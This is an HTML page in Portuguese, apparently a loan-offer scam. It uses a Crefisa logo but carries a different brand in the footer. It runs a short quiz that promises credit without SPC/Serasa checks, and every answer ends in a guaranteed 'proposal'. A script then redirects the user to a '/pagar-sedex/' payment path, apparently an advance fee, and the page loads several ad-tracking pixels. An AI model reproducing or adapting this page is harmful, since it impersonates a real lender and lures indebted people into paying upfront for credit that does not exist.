<!DOCTYPE html><html lang="pt-BR">
    
    <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
  <script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  data-utmify-prevent-subids
  async
  defer
></script>            
<script>
    window.pixelId = "6768736b2226da3b4933a2c9";
    var a = document.createElement("script");
    a.setAttribute("async", "");
    a.setAttribute("defer", "");
    a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
    document.head.appendChild(a);
  </script>
    <head>
<script type="text/javascript" async="" src="js/events.js"></script><script type="text/javascript" async="" src="js/events_1.js"></script><script type="text/javascript" async="" src="js/events_2.js"></script><script async="" src="js/fbevents.js"></script>
    <meta charset="UTF-8">
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <style>
        .header {
            background: white;
            color: white;
            padding: 15px 0;
            text-align: center;
            font-size: 1.5rem;
            font-weight: bold;
            grid-area: top-bar;
        }

        .main-content {
            max-width: 450px;
            background-color: white;
            text-align: center;
            padding: 2rem 2rem 1rem 2rem;
            border-radius: 10px;
            box-shadow: 0 2px 40px rgba(0, 0, 0, 0.1);
            margin: 0 auto;
        }

        .main-content h2 {
            margin-bottom: 20px;
        }

        .btn-custom {
            color: white;
            border: none;
            width: 100%;
            margin-bottom: 10px;
            background: #FE0064;
            font-weight: 600;
            border-radius: 1rem;
            padding: .75rem 3rem;
            letter-spacing: .3px;
            line-height: 1.15;
        }

        .btn-custom:hover {
            color: white !important;
            background-color: #FE0064 !important;
            transform: scale(1.02) !important;
        }

        .footer {
            background-color: #ffffff;
            border-top: solid 1px #e6dddd;
            color: #000;
            text-align: center;
            width: 100%;
            bottom: 0;
            grid-area: footer;
            border-bottom: solid 3px #e6007e;
            padding: 2rem 0.5rem;
            position: relative;
            margin-top: 50px;
        }

        #conclusao {
            display: none;
            /* Esconde o elemento por padrão */
        }

        #conclusao h4 {
            color: green;
            /* Define a cor do texto */
            font-weight: bold;
            /* Define o texto em negrito */
        }

        .char {
            border-top: solid px #00adca;
            background-color: #00adca;
            padding: 2px !important;
        }

        /* End custom CSS */
    </style>
   <script>
    window.pixelId = "673155e68fbe3d2e8c3ee6c3";
    var a = document.createElement("script");
    a.setAttribute("async", "");
    a.setAttribute("defer", "");
    a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
    document.head.appendChild(a);
  </script>
  <script
    src="https://cdn.utmify.com.br/scripts/utms/latest.js"
    data-utmify-prevent-subids
    async
    defer
  ></script>
  <!-- Meta Pixel Code -->
  <script>
  !function(f,b,e,v,n,t,s)
  {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
  n.callMethod.apply(n,arguments):n.queue.push(arguments)};
  if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
  n.queue=[];t=b.createElement(e);t.async=!0;
  t.src=v;s=b.getElementsByTagName(e)[0];
  s.parentNode.insertBefore(t,s)}(window, document,'script',
  'https://connect.facebook.net/en_US/fbevents.js');
  fbq('init', '1465888330757986');
  fbq('track', 'PageView');
  </script>
  <noscript><img height="1" width="1" style="display:none"
  src="https://www.facebook.com/tr?id=1465888330757986&ev=PageView&noscript=1"
  /></noscript>
  <!-- End Meta Pixel Code -->
<script async="" defer="" src="js/pixel.js"></script></head>

<body>


    <div style="
  display: grid;
  grid-template-areas:
    'top-bar'
    'content'
    'footer';
  grid-template-rows: auto 1fr auto;
  min-height: 100vh;
">
        <div class="header">
            <img decoding="async" style="width: 120px;" src="images/Crefisa.png" alt="Imagem Centralizada">
        </div>

        <div style="grid-area: content; padding: 0 1rem;">
            <div class="text-center mt-5">
                <str></str>
                <h3="">
                    <p style="color: gray;">Faça sua simulação em menos de 5 minutos!<br>Responda essas perguntas para verificar seu crédito disponível.</p>
                </h3="">
            </div>


            <div class="main-content">
                <div id="pagOne" class="mb-3">
                    <h5 class="mb-3"> O que é mais importante para você em um empréstimo?</h5>
                    <button class="btn-custom" onclick="mostrarPagina('pagTwo')">Limite de crédito alto</button>
                    <button class="btn-custom" onclick="mostrarPagina('pagTwo')">Crédito imediato</button>
                    <button class="btn-custom" onclick="mostrarPagina('pagTwo')">Não consultar SPC/Serasa</button>
                    <button class="btn-custom" onclick="mostrarPagina('pagTwo')">Juros baixos</button>
                </div>
                <!-- Seção 2: Próxima Página -->
                <div id="pagTwo" class="mb-3" style="display: none;">
                    <h5 class="mb-3">Qual motivo do empréstimo?</h5>
                    <button class="btn-custom" onclick="mostrarPagina('rendaMensal')">Pagar dívidas</button>
                    <button class="btn-custom" onclick="mostrarPagina('rendaMensal')">Comprar veículo</button>
                    <button class="btn-custom" onclick="mostrarPagina('rendaMensal')">Reformar a casa</button>
                    <button class="btn-custom" onclick="mostrarPagina('rendaMensal')">Compras em geral</button>
                    <button class="btn-custom" onclick="mostrarPagina('rendaMensal')">Investir em um negócio</button>
                    <button class="btn-custom" onclick="mostrarPagina('rendaMensal')">Pagar cartão de crédito</button>
                    <button class="btn-custom" onclick="mostrarPagina('rendaMensal')">Outro motivo</button>
                </div>
                <!-- Seção 3: Renda Mensal -->
                <div id="rendaMensal" class="mb-3" style="display: none;">
                    <h5 class="mb-3">Você já fez algum empréstimo SIM?</h5>
                    <button class="btn-custom" onclick="mostrarPagina('negativado')">Sim</button>
                    <button class="btn-custom" onclick="mostrarPagina('negativado')">Não</button>

                </div>
                <!-- Seção 4: Negativado -->
                <div id="negativado" class="mb-3" style="display: none;">
                    <h5 class="mb-3">Você está negativado?</h5>
                    <button class="btn-custom" onclick="mostrarPagina('conclusao')">Sim</button>
                    <button class="btn-custom" onclick="mostrarPagina('conclusao')">Não</button>
                </div>
                <!-- Seção 5: Conclusão -->
                <div id="conclusao" class="mb-3" style="display: none;">
                    <h4 style="color: green;">Temos uma proposta para você!</h4>
                    <p>Conclua seu cadastro e faça a simulação do seu crédito disponível agora!</p>
                   <button class="btn-custom" onclick="redirectToSedex()">Continuar</button>

<script>
    function redirectToSedex() {
        // Captura os parâmetros UTM da URL atual
        const urlParams = new URLSearchParams(window.location.search);
        
        if (urlParams.has('cpf')) {
        // Remove o parâmetro 'cpf'
        urlParams.delete('cpf');
        } 
        
        const utmParams = urlParams.toString();

        // Constrói a nova URL com os parâmetros UTM, se existirem
        let redirectUrl = '/pagar-sedex/';
        if (utmParams) {
            redirectUrl += '?' + utmParams;
        }

        // Redireciona para a nova URL
        window.location.href = redirectUrl;
    }
</script>

                </div>
            </div>
        </div>



        <script>
            function mostrarPagina(paginaId) {
                // Esconde ambas as seções
                document.getElementById('pagOne').style.display = 'none';
                document.getElementById('pagTwo').style.display = 'none';
                document.getElementById('rendaMensal').style.display = 'none';
                document.getElementById('negativado').style.display = 'none';

                // Mostra a seção desejada
                document.getElementById(paginaId).style.display = 'block';
            }
        </script>

        <script>

            function storeUTMParams() {
                const params = new URLSearchParams(window.location.search);
                const utmParams = {};

                // Armazena apenas os parâmetros UTM
                params.forEach((value, key) => {
                    if (key.startsWith('utm_')) {
                        utmParams[key] = value;
                    }
                });

                // Salva os parâmetros UTM em uma chave específica no localStorage
                localStorage.setItem('utmParams', JSON.stringify(utmParams));

                // Exibe no console o que foi armazenado no localStorage
                console.log('Parâmetros UTM armazenados no localStorage:', utmParams);
            }

            window.onload = function () {
                storeUTMParams();
            };
        </script>

        <div class="footer py-4" id="footerChg">
            © 2024 Sim, Crédito Simples <br>
            Todos os direitos reservados
        </div>

        <script type="rocketlazyloadscript" data-minify="1" src="https://positivobrasil.org/wp-content/cache/min/1/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js?ver=1724603965" defer=""></script>
    </div>
<script>
  window.pixelId = "6716c4ab73dc126a95cede78";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>
<script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>



</body></html>